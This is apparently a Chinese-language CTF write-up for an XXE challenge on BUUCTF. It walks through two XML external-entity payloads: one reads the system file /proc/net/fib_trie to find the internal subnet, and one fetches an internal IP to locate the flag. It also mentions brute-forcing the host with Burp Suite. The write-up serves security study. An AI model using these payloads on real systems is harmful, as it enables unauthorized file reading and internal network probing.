由于某种神秘的不可抗力,很久没更新了,emmmm。以后还是勤快一点吧
言归正转,这题都已经把提示给到脸上了,xml,这不试试xml注入?
经典登录界面,抓包就可以发现数据事宜xml形式的传往后台的
X-Requested-With: XMLHttpRequest
依旧推荐https://xz.aliyun.com/t/6887#toc-5
构造倒是没有多难,但这题最大的坑点在于flag不是在本地的,所以他是一个内网题。。。。
一个小经验:由于BUUCTF转用了K8S管理,他的靶机容器是随机在80,81两个网段里的
具体情况看/proc/net/fib_trie
读取到本题靶机被动态生成在了10.244.81网段,每次生成ip都是随机的
那么抓包用burpsuite爆破就好了
给出payload:
读取网段

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE a [

 <!ENTITY admin SYSTEM "file:///proc/net/fib_trie">

 ]>

<user><username>&admin;</username><password>admin</password></user>

搜索flag:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE a [

 <!ENTITY admin SYSTEM "http://10.244.81.166">

 ]>

<user><username>&admin;</username><password>admin</password></user>

参考视频链接:https://www.bilibili.com/video/BV1Y5411d7nb?spm_id_from=333.999.0.0

Logo

K8S/Kubernetes社区为您提供最前沿的新闻资讯和知识内容

更多推荐